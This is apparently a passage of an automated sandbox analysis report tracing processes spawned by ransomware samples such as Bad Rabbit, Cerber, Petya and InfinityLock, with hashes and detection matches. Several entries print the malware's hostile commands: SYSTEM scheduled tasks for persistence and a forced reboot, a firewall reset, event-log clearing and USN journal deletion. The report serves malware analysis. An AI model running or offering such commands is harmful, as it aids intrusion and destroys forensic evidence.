                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: 00000004.00000003.342061025.0000000004AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Christiaan Beek
                                                                                                        Reputation:high

                                                                                                        Target ID:5
                                                                                                        Start time:14:45:05
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:320760 bytes
                                                                                                        MD5 hash:FE1BC60A95B2C2D77CD5D232296A7FA4
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: cerber3, Description: Cerber3 , Source: 00000005.00000000.332123066.0000000000448000.00000020.00000001.01000000.00000009.sdmp, Author: pekeinfo
                                                                                                        • Rule: Cerber, Description: Cerber Payload, Source: 00000005.00000002.385124639.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                        • Rule: Cerber, Description: Cerber Payload, Source: 00000005.00000002.390905891.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                        • Rule: Cerber, Description: Cerber Payload, Source: 00000005.00000002.386803461.0000000001520000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                        • Rule: cerber3, Description: Cerber3 , Source: 00000005.00000000.332507985.0000000000448000.00000020.00000001.01000000.00000009.sdmp, Author: pekeinfo
                                                                                                        • Rule: cerber3, Description: Cerber3 , Source: 00000005.00000000.331532732.0000000000448000.00000020.00000001.01000000.00000009.sdmp, Author: pekeinfo
                                                                                                        • Rule: cerber3, Description: Cerber3 , Source: 00000005.00000000.329772556.0000000000448000.00000020.00000001.01000000.00000009.sdmp, Author: pekeinfo
                                                                                                        • Rule: cerber3, Description: Cerber3 , Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exe, Author: pekeinfo
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 91%, ReversingLabs
                                                                                                        • Detection: 76%, Metadefender, Browse
                                                                                                        Reputation:low

                                                                                                        Target ID:6
                                                                                                        Start time:14:45:05
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:taskkill /F /IM explorer.exe
                                                                                                        Imagebase:0x890000
                                                                                                        File size:74752 bytes
                                                                                                        MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Target ID:7
                                                                                                        Start time:14:45:06
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7c72c0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Target ID:8
                                                                                                        Start time:14:45:06
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:/c schtasks /Delete /F /TN rhaegal
                                                                                                        Imagebase:0xd90000
                                                                                                        File size:232960 bytes
                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Target ID:9
                                                                                                        Start time:14:45:07
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7c72c0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:10
                                                                                                        Start time:14:45:07
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:schtasks /Delete /F /TN rhaegal
                                                                                                        Imagebase:0x150000
                                                                                                        File size:185856 bytes
                                                                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:11
                                                                                                        Start time:14:45:07
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe"
                                                                                                        Imagebase:0x4c0000
                                                                                                        File size:495616 bytes
                                                                                                        MD5 hash:0A7B70EFBA0AA93D4BC0857B87AC2FCB
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: 0000000B.00000000.335032516.0000000000506000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 92%, ReversingLabs
                                                                                                        • Detection: 69%, Metadefender, Browse

                                                                                                        Target ID:12
                                                                                                        Start time:14:45:11
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 189355826 && exit"
                                                                                                        Imagebase:0xd90000
                                                                                                        File size:232960 bytes
                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:13
                                                                                                        Start time:14:45:11
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:267776 bytes
                                                                                                        MD5 hash:7D80230DF68CCBA871815D68F016C282
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe, Author: ditekSHen
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 88%, ReversingLabs
                                                                                                        • Detection: 66%, Metadefender, Browse

                                                                                                        Target ID:14
                                                                                                        Start time:14:45:11
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7c72c0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:15
                                                                                                        Start time:14:45:11
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
                                                                                                        Imagebase:0x8c0000
                                                                                                        File size:82944 bytes
                                                                                                        MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:16
                                                                                                        Start time:14:45:11
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7c72c0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:17
                                                                                                        Start time:14:45:11
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 189355826 && exit"
                                                                                                        Imagebase:0x150000
                                                                                                        File size:185856 bytes
                                                                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:18
                                                                                                        Start time:14:45:12
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:03:00
                                                                                                        Imagebase:0xd90000
                                                                                                        File size:232960 bytes
                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:20
                                                                                                        Start time:14:45:12
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7c72c0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:21
                                                                                                        Start time:14:45:12
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\DCD7.tmp
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\DCD7.tmp" \\.\pipe\{2E02CEAC-C329-41B6-9CE1-D678AB93A9A0}
                                                                                                        Imagebase:0x7ff629520000
                                                                                                        File size:62328 bytes
                                                                                                        MD5 hash:347AC3B6B791054DE3E5720A7144A977
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: mimikatz, Description: mimikatz, Source: 00000015.00000000.345508345.00007FF62952E000.00000008.00000001.01000000.0000000E.sdmp, Author: Benjamin DELPY (gentilkiwi)
                                                                                                        • Rule: mimikatz, Description: mimikatz, Source: 00000015.00000000.344932527.00007FF62952E000.00000008.00000001.01000000.0000000E.sdmp, Author: Benjamin DELPY (gentilkiwi)
                                                                                                        • Rule: mimikatz, Description: mimikatz, Source: 00000015.00000000.345317728.00007FF62952E000.00000008.00000001.01000000.0000000E.sdmp, Author: Benjamin DELPY (gentilkiwi)
                                                                                                        • Rule: mimikatz, Description: mimikatz, Source: 00000015.00000002.347606708.00007FF62952E000.00000004.00000001.01000000.0000000E.sdmp, Author: Benjamin DELPY (gentilkiwi)

                                                                                                        Target ID:22
                                                                                                        Start time:14:45:12
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\system32\netsh.exe advfirewall reset
                                                                                                        Imagebase:0x8c0000
                                                                                                        File size:82944 bytes
                                                                                                        MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:23
                                                                                                        Start time:14:45:12
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:03:00
                                                                                                        Imagebase:0x150000
                                                                                                        File size:185856 bytes
                                                                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:24
                                                                                                        Start time:14:45:13
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7c72c0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:25
                                                                                                        Start time:14:45:13
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7c72c0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:26
                                                                                                        Start time:14:45:13
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe"
                                                                                                        Imagebase:0x710000
                                                                                                        File size:216064 bytes
                                                                                                        MD5 hash:B805DB8F6A84475EF76B795B0D1ED6AE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: 0000001A.00000002.590516289.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: 0000001A.00000000.346284169.0000000000723000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: 0000001A.00000000.346200679.0000000000712000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_InfinityLock, Description: Detects InfinityLock ransomware, Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe, Author: ditekSHen
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 85%, ReversingLabs
                                                                                                        • Detection: 60%, Metadefender, Browse

                                                                                                        Target ID:27
                                                                                                        Start time:14:45:13
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 189355826 && exit
                                                                                                        Imagebase:0x7ff632260000
                                                                                                        File size:273920 bytes
                                                                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:28
                                                                                                        Start time:14:45:14
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7c72c0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:29
                                                                                                        Start time:14:45:15
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
                                                                                                        Imagebase:0xd90000
                                                                                                        File size:232960 bytes
                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:30
                                                                                                        Start time:14:45:15
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7c72c0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:31
                                                                                                        Start time:14:45:15
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:wevtutil cl Setup
                                                                                                        Imagebase:0x1190000
                                                                                                        File size:167936 bytes
                                                                                                        MD5 hash:27C3944EC1E3CAD62641ECBCEB107EE9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:32
                                                                                                        Start time:14:45:16
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:54569 bytes
                                                                                                        MD5 hash:87CCD6F4EC0E6B706D65550F90B0E3C7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 96%, ReversingLabs
                                                                                                        • Detection: 86%, Metadefender, Browse

                                                                                                        Target ID:34
                                                                                                        Start time:14:45:17
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:wevtutil cl System
                                                                                                        Imagebase:0x1190000
                                                                                                        File size:167936 bytes
                                                                                                        MD5 hash:27C3944EC1E3CAD62641ECBCEB107EE9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:35
                                                                                                        Start time:14:45:18
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\dispci.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\dispci.exe" -id 189355826
                                                                                                        Imagebase:0xac0000
                                                                                                        File size:142848 bytes
                                                                                                        MD5 hash:B14D8FAF7F0CBCFAD051CEFE5F39645F
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Florian Roth
                                                                                                        • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Christiaan Beek
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 96%, ReversingLabs
                                                                                                        • Detection: 86%, Metadefender, Browse

                                                                                                        Target ID:36
                                                                                                        Start time:14:45:18
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:wevtutil cl Security
                                                                                                        Imagebase:0x1190000
                                                                                                        File size:167936 bytes
                                                                                                        MD5 hash:27C3944EC1E3CAD62641ECBCEB107EE9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:37
                                                                                                        Start time:14:45:18
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:/c schtasks /Delete /F /TN drogon
                                                                                                        Imagebase:0xd90000
                                                                                                        File size:232960 bytes
                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:38
                                                                                                        Start time:14:45:19
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:1427968 bytes
                                                                                                        MD5 hash:63210F8F1DDE6C40A7F3643CCF0FF313
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 91%, ReversingLabs
                                                                                                        • Detection: 72%, Metadefender, Browse

                                                                                                        Target ID:39
                                                                                                        Start time:14:45:19
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:wevtutil cl Application
                                                                                                        Imagebase:0x1190000
                                                                                                        File size:167936 bytes
                                                                                                        MD5 hash:27C3944EC1E3CAD62641ECBCEB107EE9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:40
                                                                                                        Start time:14:45:19
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7c72c0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:41
                                                                                                        Start time:14:45:20
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:schtasks /Delete /F /TN drogon
                                                                                                        Imagebase:0x150000
                                                                                                        File size:185856 bytes
                                                                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:42
                                                                                                        Start time:14:45:20
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\fsutil.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:fsutil usn deletejournal /D C:
                                                                                                        Imagebase:0x13a0000
                                                                                                        File size:145408 bytes
                                                                                                        MD5 hash:140A43A2237D7D7497D4E0568B518B71
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:43
                                                                                                        Start time:14:45:22
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7c72c0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:44
                                                                                                        Start time:14:45:22
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:230912 bytes
                                                                                                        MD5 hash:AF2379CC4D607A45AC44D62135FB7015
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: Ransom_Petya, Description: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, Source: 0000002C.00000000.370824731.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Author: CCN-CERT
                                                                                                        • Rule: Ransom_Petya, Description: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, Source: 0000002C.00000002.555421468.000000000041A000.00000080.00000001.01000000.00000015.sdmp, Author: CCN-CERT
                                                                                                        • Rule: Ransom_Petya, Description: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, Source: 0000002C.00000000.367403583.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Author: CCN-CERT
                                                                                                        • Rule: Ransom_Petya, Description: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, Source: 0000002C.00000000.369916835.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Author: CCN-CERT
                                                                                                        • Rule: Ransom_Petya, Description: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, Source: 0000002C.00000000.368588781.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Author: CCN-CERT
                                                                                                        • Rule: Petya_Ransomware, Description: Detects Petya Ransomware, Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exe, Author: Florian Roth
                                                                                                        • Rule: Ransom_Petya, Description: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exe, Author: CCN-CERT
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, ReversingLabs
                                                                                                        • Detection: 84%, Metadefender, Browse

                                                                                                        Target ID:45
                                                                                                        Start time:14:45:30
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
